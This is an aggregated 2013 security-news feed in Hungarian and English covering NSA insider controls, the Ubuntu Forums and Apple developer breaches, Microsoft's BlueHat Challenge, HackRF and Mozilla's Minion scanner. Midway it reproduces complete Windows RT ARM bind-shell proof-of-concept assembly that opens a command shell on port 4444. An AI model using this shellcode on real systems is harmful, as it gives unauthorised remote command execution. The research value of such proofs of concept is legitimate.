Bruce Schneier biztonsági szakértő arról ír blogjában, hogy reagálva a Snowden-fiaskóra, az NSA kétemberes felügyeleti szabályt vezetett be a rendszeradminisztrátorai számára. Ez azt jelenti, hogy az ügynökség bármelyik rendszeradminisztrátora csak egy másik admin jelenléte mellett férhet hozzá és dolgozhat kulcsfontosságú információkhoz. Mivel közel 15 ezer telephelyen kell az új szabályt bevezetni, időbe telik majd, amíg mindenhol érvényre jut.

Keith Alexander, az NSA vezetője elmondta, hogy most már a zárva vannak a szerverszobák ahol ilyen jellegű adatokat tárolnak és csak kétfős csapatokban lehet azokba bejutni. Alexander azt is elmondta, hogy az NSA tesztidőszak után ezek a biztosítékok beépítésre kerülnének a Pentagon és a hírszerző ügynökségeknél.

Részletek itt.

Miután biztonsági incidens történt az Ubuntu fórumoknak otthont adó ubuntuforums.org-on és közel 2 millió felhasználó neve, e-mail címe, titkosított jelszava került illetéktelenek kezébe, az oldal offline állapotba került. Az elmúlt napokban az infrastruktúráért felelős csapat a szolgáltatás helyreállításán dolgozott. A munka a vége felé jár, a Canonical pedig egy összefoglalót adott ki arról, hogy mi is történt valójában. A jelentés elolvasható itt.

A fórumok jelenleg elérhetők.

Csak pletyka volt, hogy biztonsági okokból nem használhatók a kínai cég gépei védett hálózatokon angolszász országokban.

Bradley Manning was found guilty on multiple charges of espionage, theft, computer fraud, violating a lawful general regulation and one charge of wanton publication of intelligence on the internet but not of aiding the enemy. He's now facing a lifetime behind bars. Let us know what you think about it in our poll.

We were inspired by the Matasano Crypto Challenges. So we built a similar series of fun challenges to exercise reverse engineering, vulnerability discovery, and web browser manipulation attack concepts. The Xbox team helped us develop custom Xbox Live avatar items to be awarded to anyone who completes any track of the BlueHat Challenge. Beat all three tracks for access to all three avatar items (“hacker” T-shirt, “MSRC” T-shirt, “hacker” blue hat).

The challenges are all about fun and trying new things. To sign up for any of the three tracks (reverse engineering, vulnerability discovery, design-level web browser manipulation tricks), just email us at bhchall@microsoft.com. In the subject line or in the body of the message, include either [reverse], [vulns], or [web] (or click on any of those three links). Signing up for any of the three tracks will also include instructions on participating in all tracks so you can send just one email to get started.

The Challenge is designed to appeal to a wide range of people, so if the first few sets of problems seem easy, stick with it. They’ll get harder!

More information

• There’s no restriction on who can participate, no time limit, and no way to fail.
• There is no monetary reward, and this is not a contest. Your answers should be your own work. We hope that the fun and learning you gain from completing the Challenge is reward enough. We do plan on publicly recognizing people who finish the Challenge.
• If you find this sort of thing fun, you’d probably like working at Microsoft in the Trustworthy Computing group. We solve problems like this every day and we have lots of open positions. You can see a list of our available positions at http://www.twccareers.com, and we encourage you to submit an application!

You may also be interested in the Microsoft Security Bounty Programs, which provide cash rewards for eligible individuals who identify security vulnerabilities.

A quick word from our lawyers…

By participating in the Challenge, you understand that we cannot control the incoming information you will disclose to our representatives in the course of submitting your answers in the Challenge, or what our representatives will remember about your submission. You also understand that we will not restrict work assignments of representatives who have had access to your submission. By participating in the Challenge, you agree that use of information in our representatives’ unaided memories in the development or deployment of our products or services does not create liability for us in connection with the Challenge or under copyright or trade secret law.

If you do not want to grant us these rights to your answers, please do not participate in the Challenge.

FAQ

What is the BlueHat Challenge?

The BlueHat Challenge is a series of computer security problems of increasing difficulty to help you build and test your skills in three areas: reverse engineering, vulnerability discovery, and web browser manipulation attack concepts.

How does it work?

The problems are given and reviewed over email. As you complete each level, send us your answers and we’ll send you the next set of problems.

Why is Microsoft doing this?

We hope to spur interest in computer security and help people improve their skills through a self-directed learning process. We also want to give something back to the community—we think these problems are going to be a lot of fun for you to solve. We had a lot of fun coming up with them!

How long should I expect to wait for my submitted answers to be evaluated?

The timeline for evaluating the problems will depend on the number of participants in the program, the difficulty of the problem, and the clarity of your answer. Your answers are being evaluated by real people, so please be patient with us!

How long will the program continue?

We plan to continue the program as long as there is sufficient community interest. Of course, we may change the program’s design over time as we learn what works best, and we may cancel the program at any time without notice.  If there is a particular aspect of the program you like, or one track that you think is better developed than others, please let us know so we can do more of that and less of other things.

Is this the new monetary incentive/bounty program I’ve heard about?

No. This program is an educational challenge with no monetary reward. The new programs that offer monetary incentive are the Security Bounty Programs.

Where can I find information on Microsoft jobs?

Check out http://www.twccareers.com for careers in Microsoft Trustworthy Computing group. See http://www.microsoft.com/careers for more general Microsoft career information.

If I complete the Challenge and do well, am I guaranteed an interview or a job?

No. Your completion of the Challenge or your performance will not guarantee that you will get an interview or a job, nor will it preclude you from doing so. If you are interested in careers with Microsoft Trustworthy Computing, we encourage you to visit http://www.twccareers.com, where you can submit an application for any open positions that interest you.

Acknowledgements

Many people came together to make the BlueHat Challenge possible:

• Couldn’t have happened without David Seidman’s logistics magic!
• Thanks Fred Raynal and the Quarkslab team for help with the vulnerability and RE challenges
• Thanks Manuel Caballero and Mario Heiderich for developing the web design-level challenges
• Thanks Bill Barlowe, Andrew Ciccarelli, and Shonn Gilson for the back-end infrastructure help
• Thanks Rollie Watson and John Doyle from Xbox and Rajat and Mike from Lakshya Digital
• Thanks Dan Beenfeldt, Tim Hermann, and Nanae Toyozato for the “Eli the Zombie” flash game ([reverse] level 2)
• Thanks Katie Moussouris, Mike Reavey, Leah Lease, Bruce Dang, and David Ross for inspiration

- Jonathan Ness, MSRC Engineering

Trailrunner7 writes "NSA director Gen. Keith Alexander's keynote today at Black Hat USA 2013 was a tense confessional, an hour-long emotional and sometimes angry ride that shed some new insight into the spy agency's two notorious data collection programs, inspired moments of loud applause in support of the NSA, and likewise, profane heckling that called into question the legality and morality of the agency's practices. Loud voices from the overflowing crowd called out Alexander on his claims that the NSA stands for freedom while at the same time collecting, storing and analyzing telephone business records, metadata and Internet records on Americans. He also denied lying to Congress about the NSA's capabilities and activities in the name of protecting Americans from terrorism in response to such a claim from a member of the audience."

Read more of this story at Slashdot.

Okian Warrior writes in about a package of heroin that found its way to the door of Brian Krebs. "'Fans' of [security researcher Brian Krebs] have shown their affection in some curious ways. One called in a phony hostage situation that resulted in a dozen heavily armed police surrounding my home. Another opened a $20,000 new line of credit in my name. Others sent more than $1,000 in bogus PayPal donations from hacked accounts. Still more admirers paid my cable bill for the next three years using stolen credit cards. Malware authors have even used my name and likeness to peddle their wares. But the most recent attempt to embarrass and fluster this author easily takes the cake as the most elaborate: Earlier this month, the administrator of an exclusive cybercrime forum hatched and executed a plan to purchase heroin, have it mailed to my home, and then spoof a phone call from one of my neighbors alerting the local police. Thankfully, I had already established a presence on his forum and was able to monitor the scam in real time and alert my local police well in advance of the delivery."

Read more of this story at Slashdot.

Up on Kickstarter, [Michael Ossmann] is launching the HackRF, an inordinately cheap, exceedingly capable software defined radio tool that’s small enough to lose in your laptop bag.

The HackRF was the subject of a lot of interest last time it was on Hackaday - the ability to receive up to 6GHz allows the HackRF to do a lot of very interesting things, including listening in on Bluetooth, WiFi, and 4G networks. Also, the ability to transmit on these frequencies means a lot of very interesting, and quite possibly slightly evil applications are open to anyone with a HackRF. Like the RTL-SDR dongles, the HackRF works with GNU Radio out of the box, meaning all those cool SDR hacks we’ve seen so far will work with this new, more powerful board.

Compared to the USB TV tuner cards that were so popular a year ago, the HackRF has 10 times the bandwidth, is able to receive up to 6GHz, and is also able to transmit. It’s only half-duplex, so to receive and transmit simultaneously you’ll need two HackRFs, or maybe wait for a hardware revision that will hopefully come sooner rather than later.

Below you can check out [Michael]‘s presentation at Toorcon where the HackRF was unleashed to the world.

Filed under: kickstarter, radio hacks

Minion is a platform developed by the Security Automation team at Mozilla to enable integration and adoption of automated security testing that has been under development for the past year.

The platform allows any team to set up the basic requirements to perform automated scanning and testing of websites and services by providing sensible defaults for plugins that enable scanning of many types of web applications and services.

With the 0.3 release of Minion there are several milestones that have been achieved that have allowed us to start using Minion internally across our development community, quality assurance, and security teams.

Architecture

Minion is intended to be a platform that is simple to use, easy to deploy, simple to extend, and flexible enough to be integrated into any development or operations workflows. At a high level there are three major components in Minion: Plugins, Task Engine, and Front End.

Minon Plugins are light-weight wrappers that perform tasks such as configuring, starting, stopping a plan, and accept a set of callbacks to notify the caller that information is available. In order to be used, Plugins require a plugin runner that handles the invocation of the plugins as well as the results; in addition to supporting Minion’s task engine, the Minion backend repository includes command-line scripts to execute plugins. This provides support for testing during development of new plugins and allow a high degree of flexibility in how plugins are used outside of Minion.

The Task Engine is the core platform; it provides an API for managing and configuring Plans (collections of plugins and configurations), collections of users, sites and services, and the results of executions of Plans against those targets.

The Front End is a web application that provides both administration and usage of Minion; users can perform most of the configuration tasks needed to set up Minion plans, targets and users, as well as review the results of Minion scans. Being a Mozilla project, the front-end uses Persona for authentication, but all access control based decisions are built into Minion itself.

Minion Plugins

At their heart, Minion plugins are automation scripts designed to abstract away the platform, operating system, and features that an individual security tool implements, and provide a single mechanism for configuring the tool, initiating a scan, and collecting the results.

It may be helpful to look at the code for an existing plugin to better understand how they work; the AlivePlugin is a clear, simple example.

The Alive plugin is an extremely basic plugin that confirms that a host is reachable, but it implements all of the required features, and extends a BlockingPlugin. The plugin exposes some member variables that provide user interface cues (the name, links for additional information), and in this case, some built in report objects. In the do_run method the actual logic of the scan is performed, and since there is no detailed setup or stopping functionality is required, the BlockingPlugin starting and stopping functionality is sufficient.

Two base classes for plugins are provided in the Minion backend to get developers started:

• BlockingPlugin this plugin provide the basic functionality to support a plugin that performs a task, and reports it’s completion state at the end. This is suitable for creating straightforward plugins directly within Python

• ExternalProcessPlugin this plugin provides the functionality required to kick-off an external tool, and provides the basis for several other extensions, especially those that wrap existing security tools.

In addition to several basic “proof of technology” plugins that collect details about targets and provide best practice information, the Minion development team is currently maintaining three other extensions:

• OWASP Zed Attack Proxy This plugin wraps the OWASP ZAP platform and enables detailed application scanning
• Skipfish a simple, but powerful web fuzzer from Google
• nmap a port scanning tool that is generally accepted as the best in it’s class

Minion Task Engine

The Task Engine provides the core functionality for managing users, groups, sites, scans, and results within the Minion platform. Acting as a central hub, the Task Engine maintains a register of available plugins, provides facilities for creating and modifying plans, and managing user access to Minion, including which sites they can scan.

Plugins

Plugin deployment is one of the only features of Minion that cannot currently be managed from within the Front-End; this is a result of the configuration needed to deploy them, but the Minion Front-End provides the ability to review the available plugins, and get the class details, which is the information required to add a plugin to a Plan.

Plans

A Minion Plan is JSON document that provides some information about what the plan does, and a sequence of tools to invoke. An example can be found below:

 

{
     "name": "Fuzz and Scan",
     "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.",
     "workflow": [
          {
               "plugin_name": "minion.plugins.skipfish.SkipfishPlugin",
               "description": "",
               "configuration": {}
          },
          {
               "plugin_name": "minion.plugins.zap_plugin.ZAPPlugin",
               "description": "Run the ZAP Spider and Scanner",
               "configuration": {
                    "scan": true
               }
          }
     ]
}

In this example, the name and description are intended to be human readable descriptions of what the plan will do, while the workflow array contains a set of plugin names, a description that can will be included in the plan details, and a set of configuration details that may be plugin specific.

Users and Invites

Minion is intended to be a team oriented tool; as a result, the the platform allows user and group management. User accounts are created through an invitation mechanism, or via the administrative interface. The invitation system allows administrators to pre-create groups, sites and plans within Minion, and then add a user to that group before the user has enrolled. Once the invite is issued, an email will be sent to the user and the user can then access a configured profile.

Groups

Groups are the mechanism by which administrators can control how users have visibility into sites and results within in Minion. In order for a user to be able to interact with a site via Minion, that user needs to be added to the group, and the site needs to be associated with that group. This provides extremely fine grained control over visibility into scan results. Currently group membership allows both viewing of scans and the ability to re-execute a scan, but as the project progresses, constraints can be added to allow users to review results, but not initiate scans.

Minion Front-End

Designed to be easy to use and provide instant feedback, the front-end provides access to the Minion platform. Each of the pieces of the functionality described above is accessible via the front-end, and is explicitly enabled by calling the web services exposed by the Task Engine. One of the advantages of the architecture is that the front-end can be easily re-engineered with no impact to the back-end or plugins.

Technologies

Minion is built with Python, Angular.js, and several packages that assist in ensuring a reliable end to end service. These technologies were selected by our development team, but the architecture, and each of the service boundaries are intended to use JSON calls to permit easy integration with other services. Because of the design principles applied, it is entirely possible to implement plugins that run on any operating system or platform, and do not need to reside on the same service. With the appropriate network configurations it is possible to deploy the front-end, task engine, and plugins on different networks, which allows users to isolate the amount of attack surface that needs to be deployed in sensitive networks.

Road Map

There are several features that are under active development, and should be implemented over the next several releases.

Authentication & Access Management

Site Ownership Verification

This is a critical feature that enables users to demonstrate ownership of a site before initiating scans.

Granular Access Control

The ability to govern users ability to scan by group and site ownership as well as role.

Plugin Improvements

Improved Results Reporting

Minion is only as good as it’s plugins. Now that we have a working and reliable core platform, refinement of plugin results, and improving reporting is a core objective.

Deferred Execution Plugins

Sample implementations of invoking third party services so that we can demonstrate integrating with other Security as a Service platform

Reporting Plugins

Currently we have assigned risk ratings to findings based on our best practices, but that is not necessarily reflective of the priority of issues to other teams. We intend to implement a pluggable reporting interface, including the ability to add plugins to modify the risk ratings based on the security posture and priorities of the teams using Minion.

Front End

Landing Pages

Currently Minion is designed for technical users who have a need to see deep technical details. In the future, it may be desirable to generate metrics and dashboards, and to facilitate that Landing page support will be implemented to allow customization for user views.

Task Engine Improvements

Cohort

Minion is designed to support dynamic analysis via web application scanning. This is only one part of the story regarding how to perform automated security testing. Cohort is a branch of Minion that will enable analysis of source code repositories and perform static analysis.

Historical Issues

In order to facilitate ongoing tracking of a security program, support and integration for third party issue trackers (initial targets are Bugzilla and Github), and the ability to compare multiple scans over time will be implemented.

Why Minion?

The Mozilla Security team supports hundreds of websites of services, and products used by hundreds of millions of users. In addition our team supports hundreds of employees and thousands of community members that contribute to Mozilla products and services. Scaling to that level is not feasible without improving automation capabilities. While it would be much easier to solve this problem for ourselves, Mozilla’s mission is to support the open web, and protect our users. By building Minion as a foundation for a security as a service platform, integrating open source and free tools, then releasing it as open source, we aim to contribute a platform that can be used by any team to dramatically improve their coverage, and integrate security testing automation in all parts of their IT operations and software development processes.

Minion is an open source project, and we welcome contributors, users, and feedback!

• Minion Github Repository
• Minion Development Mailing List
• Minion Wiki

Finally, I would like to extend a huge thanks to Stefan Arentz, Simon Bennetts, Yeuk Hon Wong, Matthew Fuller, and all of the other developers who have moved Minion from a sheet of paper and a set of shell scripts to a production service!

McAfee has always been in the forefront of finding new ways to secure our customers against threats and risks posed by mobile devices. As part of this quest, we have introduced the concept of app reputation as part of our latest release of McAfee Mobile Security (MMS Version 3.1) released on 18th July 2013. From a consumer perspective, we have empowered our twin features of security and privacy by app reputations in this release.

What is app reputation?

We assign a rating to an android app based on two vectors of trust (security) and privacy (data exposure). As part of trust (security), we measure the amount of trust that could be attached to an app based on security considerations. Privacy (data exposure) reputation measures the propensity of an app to access/share and expose personal data. These reputations are based on the results of an automated analysis and are impacted by multiple factors including age, prevalence, source, etc.

How is Trust (Security) reputation different than Privacy (Data Exposure) reputation?

While the concept of security is the same for all users, risk to an individual’s privacy is appreciated differently in different cultures. Furthermore, unlike safety and security, which are intuitive to most of us, the concept of privacy is a trained behavior leading to different responses to privacy risks based on an individual’s context. At McAfee, we appreciate this and it reflects in our design. Hence the goal of privacy reputation is to provide information and avoid taking a uniform decision for all users, unlike what we do in trust reputation.

As the following screenshot indicates, we provide the data exposure score range, category score range, our observations about the app, and information related to ad libraries.

What are Notable apps?

Notable apps are those behaving outside of their category’s normal behavior. We understand that some categories of apps have a need to access more personal information than others. For example, a social media or a communication app would have a better case for accessing personal data than a calculator (productivity) app. So if a calculator apps tries to access personal data normally not accessed by other apps in its category, it may be classified as a notable app.

This is the first blog in a series of posts on app reputation.

An anonymous reader writes "Google today announced it has already started upgrading all of its SSL certificates to 2048-bit keys. The goal is to beef up the encryption on the connections made to its services. Google says the upgrade, which includes the root certificate that the company uses to sign all of its SSL certificates, will be completed 'in the next few months.' Previously, however, Google was more specific and said it was aiming to finish the process by the end of 2013."

Read more of this story at Slashdot.

BGP multiple banking addresses hijacked

On 24 July 2013 a significant number ...(more)...

achowe writes "The 22nd International Obfuscated C Code Contest opens 2013-Aug-01 03:14:15 UTC through to 2013-Oct-03 09:26:53 UTC. The rules have been updated, in particular Rule 2 (size rule) has changed. The draft rules and guidelines are available online. In addition there is now an IOCCC Size Rule Tool to aid with counting the secondary size rule. Questions and comments for the Judges can be emailed to q.2013@ioccc.org and must include 'IOCCC 2013' in the subject. Or contact them via Twitter @IOCCC." Anyone planning on entering?

Read more of this story at Slashdot.

Novell Client 2 SP3 Privilege Escalation Exploit

nginx Exploit Documentation About a Generic Way to Exploit Linux Targets

A US child abuse image collector turned himself in to police earlier this month, after ransomware hit his PC and showed messages warning him that the FBI were on to his nasty activities.

Yet more passwords need changing, as America's prestigious Stanford University joins the long line of recent data breach victims. Although specific details remain scarce, an announcement from the university authorities urges all users, which may include staff and alumni as well as students, to ensure their details are checked and updated ASAP.

Cisco this week rocked the security community with its plans to acquire Sourcefire for a whopping $2.7 billion – a 78 times multiple of projected earnings! Given the huge premium (called ‘outrageous’ by one street analyst) and the fact that Cisco already has its own IDS/IPS, it should be apparent to those paying attention that it wasn’t Sourcefire’s IDS/IPS technology Cisco was after. It was Sourcefire’s next-generation threat detection capabilities.

An anonymous reader writes "The High Court — England's highest civil court — has temporarily banned the publication of a scientific paper that would reveal the details of a zero day vulnerability in vehicle immobilisers and, crucially, give details of how to crack the system. Motor manufacturers argued that revealing the details of the crack would allow criminals to steal cars. Could this presage the courts getting involved in what gets posted on your local Bugzilla? It certainly means that software giants who dislike security researchers publishing the full facts on vulnerabilities might want to consider a full legal route."

Read more of this story at Slashdot.

; PoC ARMv7-A Windows RT Bind Shell
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
;        at baseaddress + 1 since it is thumb code.
;        This was built with armasm.exe from Visual Studio 2012

; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause

 AREA |.foo|, CODE, THUMB
 ; After linking, the resulting executable will only
 ; have a single section (with RX permissions) named .foo

 EXPORT main

main
 push        {r4,lr}  ; Preserve registers on the stack
 bl          ExecutePayload ; Execute bind shell function
 pop         {r4,pc}  ; Restore registers on the stack and return to caller


GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
 push        {r1-r11,lr}  ; Preserve registers on the stack
 mov         r9,r0  ; Save the function hash in R9
 mrc         p15,#0,r3,c13,c0,#2 ; R3 = &TEB
 ldr         r3,[r3,#0x30] ; R3 = &PEB
 ldr         r3,[r3,#0xC] ; R3 = PEB->Ldr
 movs        r6,#0  ; R6 = 0
 ldr         r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
 ldr         r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
 ldr         r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
 ldr         r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
 str         r3,[sp]  ; Store BaseDllName.Length/MaximumLength on the stack
 cbz         r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
 mov         r10,#0xD  ; R10 = ROR value (13)
 mov         r11,#0xD  ; R11 = ROR value (13)
get_module_hash     ; Improvement: Need to validate MaximumLength != 0
 ldrh        r5,[sp,#2]  ; BaseDllName.MaximumLength
 movs        r2,#0  ; i = 0
 cbz         r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
 ldrsb       r3,[r7,r2]  ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
 rors        r0,r6,r10  ; Calculate the next portion of the module hash
 cmp         r3,#0x61  ; Is the character lower case?
 blt         notlowercase
 adds        r3,r3,r0  ; Add to the running hash value
 subs        r6,r3,#0x20  ; Convert character to upper case
 b           get_next_char
notlowercase
 adds        r6,r3,r0  ; Add to the running hash value
get_next_char
 adds        r2,#1  ; Move to the next character
 cmp         r2,r5  ; Reached the last character in the module name?
 bcc         ror_module_char ; If not, move on to the next character
get_export_dir
 ; At this point, the module hash has been calculated.
 ; Now begin calculating the function hash
 ldr         r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
 adds        r3,r3,r4  ; PIMAGE_NT_HEADERS
 ldr         r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
 cbz         r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
 adds        r5,r3,r4  ; Calculate export dir virtual address
 ldr         r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
 ldr         r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
 movs        r0,#0
 adds        r8,r3,r4  ; AddressOfNames VA
 cbz         r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
 ldr         r3,[r8],#4  ; R3 = Current name RVA
 movs        r2,#0
 adds        lr,r3,r4  ; lr = Current name VA
get_func_char
 ldrsb       r3,[lr]  ; Load char from the function name
 rors        r2,r2,r11  ; Calculate the next portion of the function hash
 adds        r2,r2,r3  ; Add to the running hash value
 ldrsb       r3,[lr],#1  ; Peek at the next char
 cmp         r3,#0  ; Are you at the end of the function string?
 bne         get_func_char ; If not, calculate hash for the next char.
 adds        r3,r2,r6  ; Add the module hash to the function hash
 cmp         r3,r9  ; Does the calulated hash match the hash provided?
 beq         get_func_addr
 adds        r0,#1
 cmp         r0,r7  ; Are there more functions to process?
 bcc         calc_func_hash
get_next_module
 ldr         r1,[r1]  ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
 movs        r6,#0  ; Clear the function hash
 ; Improvement: The following portion is redundant
 ldr         r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
 ldr         r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
 ldr         r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
 cmp         r4,#0  ; DllBase == 0?
 str         r3,[sp]  ; Store BaseDllName.Length/MaximumLength on the stack
 bne         get_module_hash
exit_failure
 movs        r0,#0  ; Return 0 upon failure to find a matching hash
exit_success
 pop         {r1-r11,pc}  ; Restore stack and return to caller with the function address in R0
get_func_addr
 ldr         r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
 add         r3,r3,r0,lsl #1
 ldrh        r2,[r3,r4]  ; R2 = Ordinal table index
 ldr         r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
 add         r3,r3,r2,lsl #2
 ldr         r3,[r3,r4]  ; Function RVA
 adds        r0,r3,r4  ; R0 = Function VA
 b           exit_success

ExecutePayload
 ; Improvement: None of the calls to GetProcAddress
 ;  validate that a valid address was actually returned
 ; Metasploit shellcode doesn't perform this validation either. :P
 push        {r4-r11,lr}  ; Preserve registers on the stack
 subw        sp,sp,#0x214 ; Allocate soace on the stack for local variables
 movs        r3,#0x44  ; sizeof(_PROCESS_INFORMATION)
 add         r2,sp,#0x38  ; R2 = &StartupInfo
 movs        r1,#0
init_mem1
 ; Improvement: I could just initialize everything on the stack to 0
 strb        r1,[r2],#1  ; Set current byte to 0
 subs        r3,#1
 bne         init_mem1
 movs        r3,#0x10  ; sizeof(_STARTUPINFOW)
 add         r2,sp,#0x28  ; R2 = &ProcessInformation
init_mem2
 strb        r1,[r2],#1  ; Set current byte to 0
 subs        r3,#1
 bne         init_mem2

 ldr         r0,HASH_LoadLibraryA
 bl          GetProcAddress
 mov         r3,r0
 adr         r0,module_name ; &"ws2_32.dll"
 blx         r3   ; LoadLibrary("ws2_32.dll");
 ldr         r0,HASH_WsaStartup
 bl          GetProcAddress
 mov         r4,r0
 ldr         r0,HASH_WsaSocketA
 bl          GetProcAddress
 mov         r5,r0
 ldr         r0,HASH_Bind
 bl          GetProcAddress
 mov         r6,r0
 ldr         r0,HASH_Listen
 bl          GetProcAddress
 mov         r7,r0
 ldr         r0,HASH_Accept
 bl          GetProcAddress
 mov         r8,r0
 ldr         r0,HASH_CloseSocket
 bl          GetProcAddress
 mov         r9,r0
 ldr         r0,HASH_CreateProcess
 bl          GetProcAddress
 mov         r10,r0
 ldr         r0,HASH_WaitForSingleObject
 bl          GetProcAddress
 mov         r11,r0
 mov         r0,#0x0202
 add         r1,sp,#0x80
 blx         r4   ; WSAStartup(MAKEWORD(2, 2), &WSAData);
 movs        r3,#0
 movs        r2,#0
 movs        r1,#1
 movs        r0,#2
 str         r3,[sp,#4]
 str         r3,[sp]
 blx         r5   ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
 movs        r3,#2  ; service.sin_family = AF_INET;
 strh        r3,[sp,#0x18]
 movs        r3,#0  ; service.sin_addr.s_addr = 0;
 str         r3,[sp,#0x1C]
 mov         r3,#0x5C11  ; service.sin_port = HTONS(4444);
 movs        r2,#0x10
 add         r1,sp,#0x18
 strh        r3,[sp,#0x1A]
 mov         r5,r0  ; WSASocketA returned socket (s)
 blx         r6   ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
 movs        r1,#0
 mov         r0,r5
 blx         r7   ; Listen( s, 0 );
 movs        r2,#0
 movs        r1,#0
 mov         r0,r5
 blx         r8   ; AcceptedSocket = Accept( s, 0, 0 );
 mov         r4,r0
 mov         r0,r5
 blx         r9   ; CloseSocket( s ); Close the original socket
 mov         r3,#0x101  ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
 str         r3,[sp,#0x64]
 movs        r3,#0x44  ; StartupInfo.cb = 68;
 str         r3,[sp,#0x38]
 add         r3,sp,#0x28
 str         r3,[sp,#0x14]
 add         r3,sp,#0x38
 str         r3,[sp,#0x10]
 movs        r3,#0
 str         r3,[sp,#0xC]
 str         r3,[sp,#8]
 str         r3,[sp,#4]
 movs        r3,#1
 adr         r1,cmdline  ; &"cmd"
 str         r3,[sp]
 movs        r3,#0
 movs        r2,#0
 movs        r0,#0
 str         r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
 str         r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
 str         r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
 blx         r10   ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
 ldr         r0,[sp,#0x28]
 mvn         r1,#0
 blx         r11   ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
 addw        sp,sp,#0x214
 pop         {r4-r11,pc}

HASH_WaitForSingleObject
 DCD         0x601d8708
HASH_CreateProcess
 DCD         0x863fcc79
HASH_CloseSocket
 DCD         0x614d6e75
HASH_Accept
 DCD         0xe13bec74
HASH_Listen
 DCD         0xff38e9b7
HASH_Bind
 DCD         0x6737dbc2
HASH_WsaSocketA
 DCD         0xe0df0fea
HASH_WsaStartup
 DCD         0x006b8029
HASH_LoadLibraryA
 DCD         0x0726774c

cmdline
 DCB "cmd", 0x0

module_name
 DCB "ws2_32.dll", 0x0


 END

1. link.exe requires that you specify an entry point.

Solution: Easy. Provide the '/ENTRY:"main"' switch

2. Depending on the subsystem you choose, link.exe requires certain functions in the CRT to be present. For example, the following subsystems require the following entry point functions:

/SUBSYSTEM:CONSOLE - mainCRTStartup
/DLL - _DllMainCRTStartup
/SUBSYSTEM:WINDOWS - WinMainCRTStartup
/SUBSYSTEM:NATIVE - NtProcessStartup

Nem tudni, mi okozta a 35 éves Barnaby Jack halálát. A maga műfajában zseni volt.

The Apple Dev Centre data breach has taken an intriguing turn, with a self-styled security researcher calling himself Ibrahim Balic taking the credit. He's even made a video showing what he did. But will he end up shouldering the blame? Tell us what you think...

judgecorp writes "David Cameron, the British Prime Minister has promised that the UK's ISPs will be required to provide connections with 'porn blocking' filters switched on by default.. The public promise comes despite opposition from ISPs, and the near-universal acknowledgment that the system wouldn't work. Last week also saw the leak of a letter from the Department for Education which effectively told ISPs to lie — to implement their preferred 'active choice' system, and simply call it 'default-on'."

Read more of this story at Slashdot.

AmiMoJo writes "A recent job posting by MI5 seeks to recruit 'Data Exploitation Specialists.' The core of the role is described as 'provid[ing] tactical solutions and operational support to business users of information exploitation systems.' In other words, industrial espionage. This open admission comes at a time when the UK and its partners are accusing China of the same thing. Pot, meet kettle?"

Read more of this story at Slashdot.

Az Ubuntu Forums jelenleg nem elérhető. A weboldalon egy közlemény olvasható arról, hogy a szolgáltatást támadás érte, ezért leállították. A Canonical infrastruktúra csapata megkezdte a szolgáltatás helyreállítását.

A támadók nem csak deface-elték az vBulletin-alapú fórumot, hanem elvitték a közel 2 millió regisztrált felhasználó felhasználónevét, jelszavát, e-mail címét. A jelszavak nem plain text-ben tárolódtak. Ennek ellenére, ha valaki ugyanazt a jelszót használta az Ubuntu Forums-on és más helyeken is, célszerű a többi helyen mihamarabb jelszót váltani. Az Ubuntu One, Launchpad és más Ubuntu/Canonical szolgáltatások nem érintettek az incidensben.

A részletek közleményben.

Ubuntu forums are currently down because they have been breached. According to their post, &qu ...(more)...

An anonymous reader writes "Apple has informed developers that an intruder gained access to its developer site database. Quoted email from Apple: 'Last Thursday, an intruder attempted to secure personal information of our registered developers from our developer website. Sensitive personal information was encrypted and cannot be accessed, however, we have not been able to rule out the possibility that some developers' names, mailing addresses, and/or email addresses may have been accessed. In the spirit of transparency, we want to inform you of the issue. We took the site down immediately on Thursday and have been working around the clock since then. In order to prevent a security threat like this from happening again, we're completely overhauling our developer systems, updating our server software, and rebuilding our entire database. We apologize for the significant inconvenience that our downtime has caused you and we expect to have the developer website up again soon.'"

Read more of this story at Slashdot.